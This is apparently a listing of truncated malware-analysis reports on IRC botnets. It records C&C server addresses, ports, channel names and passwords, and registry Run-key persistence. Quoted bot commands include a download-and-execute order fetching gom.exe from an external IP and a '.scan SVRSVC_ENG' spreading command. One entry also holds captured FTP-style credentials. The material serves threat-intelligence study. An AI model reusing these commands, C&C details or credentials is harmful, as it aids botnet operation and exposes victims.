Remote Host Port Number 46.4.245.19 6667 NICK n{USA|XP}303134 USER 3031 “” “TsGh” :3031 JOIN #Awesome leonanenad15963 PONG :BoTNeT.GoV Other details * The following port was open in the system: Port Protocol Process 1053 TCP taskeng.exe (%AppData%taskeng.exe) Registry Modifications * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Windows Update System = “%AppData%taskeng.exe” so thatRead more...

Remote Host Port Number 109.235.49.157 80 109.235.49.236 21 109.235.49.236 35254 * The data identified by the following URLs was then requested from the remote web server: o http://global-blog.net/2.php?p1=COMPUTERNAME_cnew05ORTN&p2=.. o http://global-blog.net/2.php?p1=COMPUTERNAME_cnew05ORTN&p2=. USER rnew05@net4speed.net USER cnew05@net4speed.net 00000000 | 5041 5353 2063 6E25 7724 7033 3364 4021 | PASS cn%w$p33d@! 00000010 | 40E0 E133 3432 0D0A 5057 440DRead more...

Remote Host Port Number 67.202.108.130 6567 s1m0n3t4 67.202.109.164 80 MODE [SI|USA|00|P|34779] -ix JOIN #nuevocsm# c1rc0dus0leil PRIVMSG #nuevocsm# :[Dl]: File download: 84.0KB to: C:DOCUME~1UserNameLOCALS~1Temperaseme_83035.exe @ 84.0KB/sec. QUIT [Update]: Updating to new bin. NICK [SI|USA|00|P|51927] USER XP-2630 * 0 :COMPUTERNAME MODE [SI|USA|00|P|51927] -ix JOIN #xd# c1rc0dus0leil NICK [SI|USA|00|P|34779] USER XP-7375 * 0 :COMPUTERNAME MODE [SI|USA|00|P|38552] -ix JOINRead more...

Remote Host Port Number 200.164.228.252 31337 pass 1a2z3a4za6z5s6x5 NICK ^[USA]-[XP-SP2]-069721 USER 1360 “” “lol” :1360 PONG :412CF8FD JOIN #jklolimawasp## 1a2z3a4za6z5s6x5 PRIVMSG #jklolimawasp## : Bot killed from the system! Now talking in #jklolimawasp## Topic On: [ #jklolimawasp## ] [ !msn lol omfg. watch this http://www.ibrokemyinter.net/clips/ ] Topic By: [ nickserv ] Modes On: [ #jklolimawasp## ]Read more...

Remote Host Port Number 61.86.5.250 3305 PASS secretpass NICK P|vd0dk5h1i USER s0ppm59wh * 0 :USA|XP|549 USERHOST P|vd0dk5h1i MODE P|vd0dk5h1i JOIN #s echo Other details * The following ports were open in the system: Port Protocol Process 1057 TCP uninstall_.exe (%FontsDir%uninstall_.exe) 1089 TCP uninstall_.exe (%FontsDir%uninstall_.exe) 1090 TCP uninstall_.exe (%FontsDir%uninstall_.exe) 1091 TCP uninstall_.exe (%FontsDir%uninstall_.exe) 1092 TCP uninstall_.exeRead more...

Remote Host Port Number 109.123.108.61 81 ircd here 200.54.145.171 81 ircd here 88.208.209.166 81 ircd here 67.195.140.222 80 Resolved : [updateserver.net] To [88.208.209.166] Resolved : [updateserver.net] To [109.123.108.61] PONG :hub.not.found NICK n[USA|XP|COMPUTERNAME]ajudsuq USER n “” “lol” :n JOIN #biz# PONG 422 NICK n[USA|XP]1167074 PONG :request2.not.found USER s “” “lol” :s JOIN #newbin# * The dataRead more...

Remote Host Port Number 4c.59.85ae.static.theplanet.com 25 168.143.62.231 25 173.12.132.82 25 174.120.139.61 25 204.3.73.205 25 209.85.227.27 25 216.146.33.7 25 216.230.241.211 25 63.231.199.37 25 64.182.102.193 25 205.134.160.74 80 85.17.94.148 80 91.211.117.76 80 69.42.218.75 8878 ircd here 85.17.94.148 8080 USER dfhmiynb dfhmiynb dfhmiynb :qxujoylh NICK vpOjlDGlp MODE vpOjlDGlp +xi JOIN #maxi USERHOST vpOjlDGlp MODE #maxi +smntu PONG :lols.nope.comRead more...

Remote Host Port Number 46.4.229.246 51987 USER rA rA rA rA NICK [rA|USA|XP|22289] JOIN #testtorrent nokey PRIVMSG #testtorrent : 4New Torrent Infection PING :IRC.Secret.GoV Other details * The following port was open in the system: Port Protocol Process 1051 TCP taskhost.exe (%AppData%taskhost.exe) Registry Modifications * The newly created Registry Value is: o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + InternetRead more...

nice.niceshot.in 67.202.108.130 nice.niceshot.in 67.202.108.14 C&C Server: 67.202.108.130:6567 PASS s1m0n3t4 Server Password: Username: XP-8720 Nickname: [SI|DEU|00|P|91959] Channel: #nuevocsm# (Password: c1rc0dus0leil) Channeltopic: :.desfi http://209.217.224.53/~chinchad/pa/gom.exe c:WINDOWSsali.exe 1 C&C Server: 67.202.108.14:6567 Server Password: Username: XP-6573 Nickname: [SI|DEU|00|P|59178] Channel: #nuevocsm# (Password: c1rc0dus0leil) Channeltopic: :.desfi http://209.217.224.53/~chinchad/pa/gom.exe c:WINDOWSsali.exe 1 Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Ci Servs” =Read more...

Remote Host Port Number 70.61.101.163 9595 PASS prison 72.233.89.199 80 91.198.22.70 80 PONG leaf.989.com NICK {iNF-00-USA-XP-COMP-2202} USER MEAT * 0 :COMP JOIN ###mini NICK {00-USA-XP-COMP-2562} Now talking in ###USA Topic On: [ ###USA ] [ .scan SVRSVC_ENG 100 10 0 -c ] Topic By: [ pe[ro ] Modes On: [ ###USA ] [ +smntu ]Read more...